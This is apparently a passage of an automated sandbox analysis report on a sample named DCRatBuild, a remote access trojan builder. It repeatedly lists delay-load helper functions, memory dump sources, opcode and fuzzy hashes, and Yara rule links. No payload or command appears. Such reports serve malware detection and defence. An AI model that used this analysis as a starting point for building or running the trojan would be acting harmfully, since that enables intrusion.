                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                      • Instruction ID: 8d776ac90ff0905748a87bfc75feb013670f7c19dc6288f3508f7098a24ab319
                      • Opcode Fuzzy Hash: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                      • Instruction Fuzzy Hash: 20B012912AD6026C320871047D03E36162FCCC1B20330C01FF44FD12C0F4409C084432
                      Function 00D7D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                      • Instruction ID: 9838c794a9f57ae96aca407e6f504d79c79cdb00d7d181d130788accd0cc9a3d
                      • Opcode Fuzzy Hash: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                      • Instruction Fuzzy Hash: BBB0129127D9026C320871047D03E36166FCCC0B20330C01FF04FD12C0F8409C084432
                      Function 00D7D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                      • Instruction ID: 3fd5b8ec4894a76c71e7afb97dad15f6bd798fe83a0568a2a7fde65c2e4fb5f3
                      • Opcode Fuzzy Hash: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                      • Instruction Fuzzy Hash: CEB0129126C2026C320971147D03E36167DCCC1B20331C01FF54FD12C0F5409C084432
                      Function 00D7DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                      • Instruction ID: 425e4f52d10ea182e07de1c16309ecb5b4fa23cb50dce7c9309f15b5f80057fb
                      • Opcode Fuzzy Hash: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                      • Instruction Fuzzy Hash: 6FB0129126C0026C320871057E03F3E126EDDC4B20330C52FF00FC1144F8448C0D5431
                      Function 00D7DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                      • Instruction ID: 791791de184434ea9fc46c0c34d5796cfc70be29561b95e828bb9700e74d8e60
                      • Opcode Fuzzy Hash: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                      • Instruction Fuzzy Hash: 95B012A226C102AC32087105BE03E3A126DCDC0B20330C11FF44FC1144F4488C085431
                      Function 00D7DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                      • Instruction ID: b5fa89fa7e3a18d9eb34c023e6a550f154ff33004e222bedece224773f1b39ea
                      • Opcode Fuzzy Hash: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                      • Instruction Fuzzy Hash: 3DB0929526C0026D220861142907E36223ED880B20321802FB00EC1140A9408C099031
                      Function 00D7DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                      • Instruction ID: edf5d0a094b3638d0fd460bbf4c3e91741024b17bf8aab8398e6d8b9aee3ef46
                      • Opcode Fuzzy Hash: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                      • Instruction Fuzzy Hash: 50B0929526C1066D220811002D07D36223ED880B20321822FB00E90040A9408C489031
                      Function 00D7DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                      • Instruction ID: 4025da67312c593f7d381bd3aa07bfa54e7a3d79a4c5df0a5cae3ad06867dfb4
                      • Opcode Fuzzy Hash: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                      • Instruction Fuzzy Hash: 94B0129536C0436D320C51043E07E37233ECCC0B20331C11FF10EC1140F9808C099031
                      Function 00D7DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 0f942bd0ca81b08466cc7394859f2a85500f60751a27a878bf86da9091b0caaf
                      • Instruction ID: df98ce7c7fe28b317bbb8092579870707dddb0d41890c3d233e0347f22d00cec
                      • Opcode Fuzzy Hash: 0f942bd0ca81b08466cc7394859f2a85500f60751a27a878bf86da9091b0caaf
                      • Instruction Fuzzy Hash: A8B0129536C103AD320C51043D07E37223ECCC0B20331C11FF40EC2140F9408C0C9031
                      Function 00D7DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 9863f028ad79830540f4b15ab7d7e98ef159e9a56a2ef8cffc2263b8913e3b77
                      • Instruction ID: df7366d306a2b16ccad13115186cfc401355a8a6fcf7f669d030a25b460a51b1
                      • Opcode Fuzzy Hash: 9863f028ad79830540f4b15ab7d7e98ef159e9a56a2ef8cffc2263b8913e3b77
                      • Instruction Fuzzy Hash: 22B012D12AC1026C320871457E03F3B126EEDC0B20330C11FF40FC1144F8448C085531
                      Function 00D7DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: e0a18959e66248f0e09ce3deeefb02f3191706c06e006821e421c14a514ff954
                      • Instruction ID: b0ecf3ea35b1c5b10cda06acc0e4ab1dd38c2c42f0fdac3be57544ad50380d31
                      • Opcode Fuzzy Hash: e0a18959e66248f0e09ce3deeefb02f3191706c06e006821e421c14a514ff954
                      • Instruction Fuzzy Hash: 86B0129526C302AD320C61047D03E36123DCCC8F20335C51FF50ED1140F580AC084431
                      Function 00D7DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: f731a2a9e80cb6567b05ac968d7b129f7e0caea192543775a5592b2dbd46260b
                      • Instruction ID: 957a858cd452b4f9721ea89e7588a8c0f3510b5c1df8a40182a149b223306f70
                      • Opcode Fuzzy Hash: f731a2a9e80cb6567b05ac968d7b129f7e0caea192543775a5592b2dbd46260b
                      • Instruction Fuzzy Hash: 29B0129527C302AD320C61047D03E36123DCCC4F20334C51FF10ED1140F980AC084431
                      Function 00D7DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: d6781375a9b92d7dcf8502a681de5d2e1810de029fac71bcfc1919fc621c4149
                      • Instruction ID: a01f909225eb793e44d7e98860adb84f7cb1c8dcc4ecbf14a34575b5c53b5b44
                      • Opcode Fuzzy Hash: d6781375a9b92d7dcf8502a681de5d2e1810de029fac71bcfc1919fc621c4149
                      • Instruction Fuzzy Hash: C2B0129526C302BD320C21007F03D36523ECDC4F20335C61FF10EE0040B580AC485431
                      Function 00D7D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: de5064f1482eb11e318654cf95236964b94d570969fb30e4258626113147b028
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: de5064f1482eb11e318654cf95236964b94d570969fb30e4258626113147b028
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: b11b6f3207f5ad032fc619a2660d2d9488d6af45ab260af0da9b08fda588c972
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                      • Opcode Fuzzy Hash: b11b6f3207f5ad032fc619a2660d2d9488d6af45ab260af0da9b08fda588c972
                      • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                      Function 00D7D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                      Download Yara Rule
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: efc44e7fe19eb225e8dc3098ad2cc25ea8804a2ed9152360ade98030c7b33121
                      • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
